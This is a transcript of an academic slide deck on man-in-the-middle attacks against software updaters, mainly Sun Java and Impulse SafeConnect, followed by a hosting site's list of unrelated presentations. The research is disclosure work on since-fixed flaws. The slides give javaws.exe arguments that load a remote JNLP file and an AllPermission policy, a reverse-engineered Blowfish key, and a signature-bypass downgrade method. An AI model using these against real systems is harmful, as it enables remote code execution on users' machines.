protecting free and open communications on the internet
play

Protecting Free and Open Communications on the Internet Against - PowerPoint PPT Presentation

Feb 28, 2023 •289 likes •569 views

Protecting Free and Open Communications on the Internet Against Man-in-the-Middle Attacks on Third-Party Software Jeffrey Knockel, Jedidiah Crandall Computer Science Department University of New Mexico Recent News Iran: forged SSL

  1. Protecting Free and Open Communications on the Internet Against Man-in-the-Middle Attacks on Third-Party Software Jeffrey Knockel, Jedidiah Crandall Computer Science Department University of New Mexico

  3. Recent News ● Iran: forged SSL certificates for update servers[1] ● Egypt: government licensed FinFisher to exploit iTunes updates[2] ● Flame malware exploits MD5 collision with Windows updates[3] [1]https://blog.torproject.org/blog/diginotar-damage-disclosure [2]http://www.theregister.co.uk/2011/09/21/egypt_cyber_spy_controversy/ [3]http://krebsonsecurity.com/2012/06/flame-malware-prompts-microsoft-patch/

  4. Insecure HTTP

  5. Unsigned Executables

  6. Software Updates ● Performance ● Security ● Under one minute install

  7. Problem ● Untrusted networks ● Hotel/coffee shop wireless ● Foreign country ● A man in the middle can exploit even sophisticated updaters using asymmetric crypto

  8. Sun Java

  9. Exploit Time Frame ...September 2011 — February 2012

  10. Updates ● We look at Java 6 (Java 7 is analogous) ● Automatic updater periodically queries javadl-esd.sun.com/update/1.6.0/map-m-1.6.0.xml ● Points to update information javadl-esd.sun.com/update/1.6.0/au-descriptor-1.6.0_31-b79.xml ● Contains ● URL for installer ● Command line arguments ● SHA1 hash of installer

  11. Verification ● Installer is downloaded and verified ● Against XML-provided hash ● To have “Sun Microsystems, Inc.” digital signature ● To have a PE version number at least as high

  12. To Exploit ● We want an executable that ● Has same SHA1 hash as in XML – We can provide a different hash ● Has a “Sun Microsystems, Inc.” digital signature ● Has a PE version number at least as high ● Can still somehow run arbitrary code

  13. Exploit ● javaws.exe

  14. Exploit ● javaws.exe ● Arguments: ● http://url/to/hello.jnlp ● -J-Djava.security.policy=http://url/to/grantall.jp ● -Xnosplash grant { ● -open permission java.security.AllPermission; }; ● Fixed in Java 6 Update 31, 7 Update 3 ● HTTPS to fetch XML

  15. Impulse SafeConnect

  16. Exploit Time Frame ...July 2011 — August 2011

  17. Updates ● Silently updates itself ● Connects to hard-coded 198.31.193.211 via HTTP (only accessible on campus) ● XML communication encrypted via Blowfish key in ECB mode (reverse engineered): \x4f\xbd\x06\x00\x00\xca\x9c\x18\x03\xfc\x91\x3f

  18. Verification ● Server responds with Blowfish-encrypted URL's and MD5 hashes for updated files ● Files are downloaded ● Files are verified to have “Impulse Point LLC” digital signature

  19. Problem ● Blowfish encryption is symmetric ● We can receive XML updates ⇒ We can send client arbitrary XML ● ● But update files need signature

  20. Exploit ● Get around digital signature verification ● “Upgrade” to an older client that is signed but performs no check ● “Upgrade” older client to arbitrary code ● Fixed by 5059.242 by using HTTPS ● Must be on campus to receive fix ● HTTPS private key one hop away

  21. Other Programs ● Virtualbox (verification left to user) ● Downloads update information via HTTP ● Download links open in browser

  22. Other Programs ● Adobe Flash (suspicious) ● Downloads XML via HTTP ● Verifies digital signature of installer ● Downloaded installer verifies that a newer version of Flash is not installed ● Google Chrome (cool) ● Downloads signed XML via HTTP ● Verifies XML's signature ● Downloads installer via HTTP ● Verifies installer's hash against XML

  23. Impact ● These aren't hard to find ● With just two, we could own ● Windows + Java users ● Anyone on our campus wifi ● Governments can do much better than us

  24. Solutions? ● Smart people really have difficulty doing updates ● Despite trying really hard ● How can we protect the FOCI of users on untrusted networks?

  25. Solutions? ● Find and fix vulnerable software? ● All vulnerable software ● Most vulnerable software ● Give users tools to detect unsafe updates? ● Blacklist ● Dynamic analysis

  26. Solutions? ● More libraries? OS-provided service? ● Optional (TUF[4]) ● Required... ● Walled gardens? ● Walled gardens commonly censor[5] – Competing technology – Obscene material – Religiously controversial material – Content “over the line” [4]https://theupdateframework.com/ [5]https://developer.apple.com/appstore/resources/approval/guidelines.html

  27. Acknowledgments This material is based upon work supported by the National Science Foundation under Grant Nos. #0844880, #0905177, and #1017602. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the National Science Foundation.

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Internet Privacy Proxies, VPNs and Tor for private communications in the public Internet

Internet Privacy Proxies, VPNs and Tor for private communications in the public Internet

Free Technology Workshop Internet Privacy Proxies, VPNs and Tor for private communications in the public Internet Organised by Steven Gordon Room RS401 9am - 12noon Friday 20 June 2014 http://ict.siit.tu.ac.th/moodle/ Demos and Tasks

684 views • 10 slides
Export Control Compliance Protecting MIT's open research policy and the free interchange of

Export Control Compliance Protecting MIT's open research policy and the free interchange of

Export Control Compliance Protecting MIT's open research policy and the free interchange of information among scholars while complying with U.S. Export Control Law Janet C. Johnston Export Control Officer * Nicole Levidow Compliance

1.08k views • 58 slides
Secure Communications over the Internet Part 2 Hassen Sallay, Ph.D WHY USE THE INTERNET for

Secure Communications over the Internet Part 2 Hassen Sallay, Ph.D WHY USE THE INTERNET for

Secure Communications over the Internet Part 2 Hassen Sallay, Ph.D WHY USE THE INTERNET for Secure Communications? The Internet offers: Virtually universal worldwide coverage. Access to anywhere from anywhere, stationary or mobile.

788 views • 47 slides
Protecting children on the internet Aly Harakeh Spokesperson Business Software Alliance Eastern

Protecting children on the internet Aly Harakeh Spokesperson Business Software Alliance Eastern

Protecting children on the internet Aly Harakeh Spokesperson Business Software Alliance Eastern Mediterranean Committee alyh@microsoft.com Is the internet as dangerous as people think? (Or what is the internet?) The internet is public

340 views • 19 slides
osmocom.org - FOSS for mobile networks community based Free / Open Source Software for

osmocom.org - FOSS for mobile networks community based Free / Open Source Software for

Researching communications systems Bootstrapping Osmocom The Osmocom project osmocom.org - FOSS for mobile networks community based Free / Open Source Software for communications Harald Welte <hwelte@sysmocom.de> gnumonks.org

782 views • 36 slides
Tor: Anonymous Communications for the Dept of Defense ... and you. Roger Dingledine The Free

Tor: Anonymous Communications for the Dept of Defense ... and you. Roger Dingledine The Free

Tor: Anonymous Communications for the Dept of Defense ... and you. Roger Dingledine The Free Haven Project http://tor.eff.org/ 1 Tor: Big Picture Freely available (Open Source), unencumbered. Comes with a spec and full documentation:

704 views • 49 slides
Tor: Anonymous Communications for the Dept of Defense ... and you. Roger Dingledine The Free

Tor: Anonymous Communications for the Dept of Defense ... and you. Roger Dingledine The Free

Tor: Anonymous Communications for the Dept of Defense ... and you. Roger Dingledine The Free Haven Project http://tor.eff.org/ 1 Tor: Big Picture Freely available (Open Source), unencumbered. Comes with a spec and full documentation:

806 views • 56 slides
Tor: Anonymous Communications for the US Dept of Defense ... and you. Roger Dingledine The Free

Tor: Anonymous Communications for the US Dept of Defense ... and you. Roger Dingledine The Free

Tor: Anonymous Communications for the US Dept of Defense ... and you. Roger Dingledine The Free Haven Project http://tor.eff.org/ 1 Tor: Big Picture Freely available (Open Source), unencumbered. Comes with a spec and full

1k views • 54 slides
Protecting Interprocess Communications Operating systems provide various kinds of

Protecting Interprocess Communications Operating systems provide various kinds of

Protecting Interprocess Communications Operating systems provide various kinds of interprocess communications Messages Semaphores Shared memory Sockets How can we be sure theyre used properly? Lecture 8 Page 1 CS 236

266 views • 25 slides
open platform, open tools and open data for an open Internet Tiziana Refice (tiziana@google.com)

open platform, open tools and open data for an open Internet Tiziana Refice (tiziana@google.com)

open platform, open tools and open data for an open Internet Tiziana Refice (tiziana@google.com) ISMA 2012 What & who is M-Lab? Measurement Lab (M-Lab) is a collaborative, researcher-driven effort to empower Internet users , researchers ,

483 views • 17 slides
osmocom.org - FOSS for mobile comms community based Free / Open Source Software for

osmocom.org - FOSS for mobile comms community based Free / Open Source Software for

Researching communications systems Bootstrapping Osmocom The Osmocom project osmocom.org - FOSS for mobile comms community based Free / Open Source Software for communications Harald Welte <laforge@gnumonks.org> gnumonks.org

959 views • 36 slides
osmocom.org - FOSS for mobile comms community based Free / Open Source Software for

osmocom.org - FOSS for mobile comms community based Free / Open Source Software for

Researching communications systems The Osmocom project Non-osmocom projects osmocom.org - FOSS for mobile comms community based Free / Open Source Software for communications Harald Welte <laforge@gnumonks.org> gnumonks.org

1.15k views • 43 slides
The Internet IP Addresses Internet Apps TCP ITS323: Introduction to Data Communications

The Internet IP Addresses Internet Apps TCP ITS323: Introduction to Data Communications

ITS323/CSS331 Internet Internetworking IP The Internet IP Addresses Internet Apps TCP ITS323: Introduction to Data Communications Application CSS331: Fundamentals of Data Communications Sirindhorn International Institute of Technology

745 views • 43 slides
Personal CyberSecurity Protecting Yourself from the Evils of the Internet Steve McEvoy March 6 th

Personal CyberSecurity Protecting Yourself from the Evils of the Internet Steve McEvoy March 6 th

Personal CyberSecurity Protecting Yourself from the Evils of the Internet Steve McEvoy March 6 th , 2020 Austin, TX The Internet has some scary s**t going on This is a self defense course Goals What is the #1 Security Risk to your

786 views • 60 slides
THE INTERNET IS FOR EVERYONE Join us to keep the Internet open, thriving, and benefitting people

THE INTERNET IS FOR EVERYONE Join us to keep the Internet open, thriving, and benefitting people

THE INTERNET IS FOR EVERYONE Join us to keep the Internet open, thriving, and benefitting people around the globe. Conference on Global Internet Interconnection Center for Information Technology Policy Princeton University 11 March 2016

517 views • 20 slides
Free and Open Source Accessibility Free and Open Source Accessibility Peter Korn Accessibility

Free and Open Source Accessibility Free and Open Source Accessibility Peter Korn Accessibility

Free and Open Source Accessibility Free and Open Source Accessibility Peter Korn Accessibility Architect Sun Microsystems, Inc. Libert, Egalit, Fraternit! The Rights of Man These are the noble goals of a free and fair society. But

570 views • 20 slides
1 Processes and the Kernel The Kernel Processes and the Kernel The Kernel Today, all

1 Processes and the Kernel The Kernel Processes and the Kernel The Kernel Today, all

Memory Protection Memory Protection Paging Virtual memory provides protection by: Each process (user or OS) has different virtual memory space. Machines and Virtualization Machines and Virtualization The OS maintain the page tables

83 views • 5 slides
Fast Write Protection Xiao Guangrong <xiaoguangrong@tencent.com> Agenda Background

Fast Write Protection Xiao Guangrong <xiaoguangrong@tencent.com> Agenda Background

Fast Write Protection Xiao Guangrong <xiaoguangrong@tencent.com> Agenda Background Challenges Fast write protection Dirty bitmap Evaluation Future plan Background Live migration is a key feature for cloud

605 views • 21 slides
CO2101 Processes and Multi-tasking Tom Ridge (tr61) 7th October 2019 tr61 Multi-tasking

CO2101 Processes and Multi-tasking Tom Ridge (tr61) 7th October 2019 tr61 Multi-tasking

CO2101 Processes and Multi-tasking Tom Ridge (tr61) 7th October 2019 tr61 Multi-tasking 7th October 2019 1 / 33 How to implement multi-tasking Why multi-tasking? Simple Fetch-Execute Cycle CPU operates in a Fetch-Execute cycle it

1.27k views • 108 slides
Programming and Data Structures (PDS) (Theory: 3-1-0) The basic components of a digital

Programming and Data Structures (PDS) (Theory: 3-1-0) The basic components of a digital

CS11001/CS11002 Programming and Data Structures (PDS) (Theory: 3-1-0) The basic components of a digital computer Input devices These are the devices using which the user provides input instances. In a programmable computer, input devices

384 views • 20 slides
For the Love of Fashion Third Quarter 2018 Results 1 IMPORTANT NOTICE This presentation, and

For the Love of Fashion Third Quarter 2018 Results 1 IMPORTANT NOTICE This presentation, and

For the Love of Fashion Third Quarter 2018 Results 1 IMPORTANT NOTICE This presentation, and the accompanying oral presentation, contains forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. All

235 views • 12 slides
From Feedforward-Designed Convolutional Neural Networks (FF-CNNs) to Successive Subspace Learning

From Feedforward-Designed Convolutional Neural Networks (FF-CNNs) to Successive Subspace Learning

From Feedforward-Designed Convolutional Neural Networks (FF-CNNs) to Successive Subspace Learning (SSL) January 30, 2020 C.-C. Jay Kuo University of Southern California 1 Introduction Deep Learning provides an effective solution when

961 views • 60 slides
Network Firewalls John Kristoff jtk@depaul.edu +1 312 3625878 DePaul University Chicago, IL

Network Firewalls John Kristoff jtk@depaul.edu +1 312 3625878 DePaul University Chicago, IL

Network Firewalls John Kristoff jtk@depaul.edu +1 312 3625878 DePaul University Chicago, IL 60604 Security Forum 2001 John Kristoff DePaul University 1 The network is just a highway How do you

404 views • 15 slides
Flip-Flops Assume the an edge-triggered flip-flop FF implements a Boolean function f with

Flip-Flops Assume the an edge-triggered flip-flop FF implements a Boolean function f with

An edge-triggered flip-flop is not a combinational circuit. Claim: An edge-triggered flip-flop is not a combinational circuit.

214 views • 3 slides

More recommend